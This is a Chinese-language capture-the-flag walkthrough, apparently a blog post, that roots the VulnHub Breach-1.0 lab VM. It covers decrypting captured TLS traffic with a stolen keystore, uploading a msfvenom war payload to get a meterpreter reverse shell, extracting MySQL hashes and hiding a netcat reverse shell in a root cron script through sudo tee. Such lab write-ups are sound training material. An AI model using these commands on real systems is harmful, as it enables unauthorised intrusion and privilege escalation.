kali渗透综合靶机–Breach-1.0靶机

下载地址:

下载链接:https://download.vulnhub.com/breach/Breach-1.0.zip

端口扫描

因为这个靶机,按照配置需求,我们已经知道了他的ip,所以我们直接开始端口扫描

nmap -T4 -A -v 192.168.110.140

但是,和我们想的有点出入,扫出来端口有点多,估计是不让我们进行端口扫描

kali渗透综合靶机--Breach-1.0靶机

没办法,我们先打开自己最喜欢的80

kali渗透综合靶机--Breach-1.0靶机

查看源码

右键查看源代码,或者F12,我们可以看见有一段注释

kali渗透综合靶机--Breach-1.0靶机

看起来像是加密,管他的,直接解密再说,经过两次解密,成功获得一下内容

kali渗透综合靶机--Breach-1.0靶机
pgibbons:damnitfeel$goodtobeagang$ta

盲猜是一个账号密码,现在找找有什么地方可以进去

点开刚刚的帅哥图片,我们进去另外一个新的网页,一顿乱点,我们进入了一次cms系统

kali渗透综合靶机--Breach-1.0靶机
kali渗透综合靶机--Breach-1.0靶机

目录扫描

dirb http://192.168.110.140

通过扫描,我们没有发现扫描其他有用的目录

kali渗透综合靶机--Breach-1.0靶机

成功使用刚刚的密码,进入系统

kali渗透综合靶机--Breach-1.0靶机

出现一个目录系统,管他的,先看看有没有可以使用的

扫描漏洞

对于开源cms系统,我们可以去扫描已知开源漏洞,接下来打开msf

kali渗透综合靶机--Breach-1.0靶机

虽然扫出来几个漏洞,但是没办法使用

现在只能再来看看cms里面还有没有什么好东西可以利用

突然看见有几份邮件

kali渗透综合靶机--Breach-1.0靶机

我们看见这里有一个.keystore文件

kali渗透综合靶机--Breach-1.0靶机

接着我们有发现了这样一个文件,是wireshark的流量包

kali渗透综合靶机--Breach-1.0靶机

并且发现一个密码”tomcat“,接下来,我们解密这个keystore

使用命令,拿到证书,我们导入wireshark

keytool -importkeystore -srckeystore keystore -destkeystore tomcatkeystore.p12 -deststoretype pkcs12 -srcalias tomcat
kali渗透综合靶机--Breach-1.0靶机

编辑–首选项–protocals–TLS –edit

kali渗透综合靶机--Breach-1.0靶机

对流量进行过滤

ip.src==192.168.110.140 || ip.dst == 192.168.110.140 and http

解密后,得到这样一个地址

图片[15]-kali渗透综合靶机–Breach-1.0靶机-安全小天地

浏览器却打不开,提示非安全链接。。。。

kali渗透综合靶机--Breach-1.0靶机

接下来,我们使用burp来进行代理绕过证书 限制

接下来,就可以进去了

kali渗透综合靶机--Breach-1.0靶机

出现一个登录框

kali渗透综合靶机--Breach-1.0靶机

通过浏览抓包,接着找到账号密码

kali渗透综合靶机--Breach-1.0靶机

我们进入新的管理应用后台

kali渗透综合靶机--Breach-1.0靶机

这里有个上传的文件地方,我们来上传木马

kali渗透综合靶机--Breach-1.0靶机

创建war包

msfvenom -p java/meterpreter/reverse_tcp lhost=192.168.110.129 lport=7777 -f war -o kali.war

设置msfconsole监听

依次输入一下代码

use exploit/multi/handler
set payload java/meterpreter/reverse_tcp
set lhost 192.168.110.129
set lport 7777
exploit
kali渗透综合靶机--Breach-1.0靶机

快速上传kali.war 并且访问,成功获取权限

kali渗透综合靶机--Breach-1.0靶机

metersploit默认不能交互式shell,但是如何安装了python,可以使用一下命令进行切换

python -c 'import pty;pty.spawn("/bin/bash")'
kali渗透综合靶机--Breach-1.0靶机

然后我们查看到该网站为apache部署的,Apache默认网站在/var/www下面

发现一个mysql数据库,并且知道数据库为root,密码为空

kali渗透综合靶机--Breach-1.0靶机

使用一下代码获得用户密码

show databases;
use mysql;
show tables;
select user,password from user;
kali渗透综合靶机--Breach-1.0靶机

通过MD5解密获得,milton的密码为thelaststraw

kali渗透综合靶机--Breach-1.0靶机

从历史命令里面空间,他切换过用户,但是密码确实离谱,来源于以前的那一堆图片里面,使用的图片隐写

kali渗透综合靶机--Breach-1.0靶机

将图片都下载下了之后,使用exiftool工具获取到隐藏文件信息

exiftool * | grep -i -e 'File Name' -e 'Comment'
kali渗透综合靶机--Breach-1.0靶机

接着我们成功进入blumbergh

kali渗透综合靶机--Breach-1.0靶机

通过我们查看历史,我们发现一个定时任务,可以借此来新建反弹shell

kali渗透综合靶机--Breach-1.0靶机

kali再新建一个监听 nc -lvvp 5555

kali渗透综合靶机--Breach-1.0靶机

先将反弹shell命令写入shell.txt文件,nc反弹命令

echo "nc -e /bin/bash 192.168.110.129 5555" > shell.txt

再使用tee命令将shell.txt内容输出到tidyup.sh

cat shell.txt | sudo /usr/bin/tee /usr/share/cleanup/tidyup.sh

也可以用mknod backpipe p && nc 192.168.110.129 2222 0<backpipe | /bin/bash 1>backpipe反弹shell

查看tidyup.sh文件写入成功:cat /usr/share/cleanup/tidyup.sh

成功获取root权限

kali渗透综合靶机--Breach-1.0靶机


「渗透云记」公众号里主要记录我每天的所思所想,我会坚持更新质量不错的文章,感兴趣的小伙伴可以扫描下方二维码,谢谢支持! 安全小天地 - 公众号 - 渗透云记
© 版权声明
THE END
喜欢就支持一下吧
点赞16 分享
评论 抢沙发

请登录后发表评论

    请登录后查看评论内容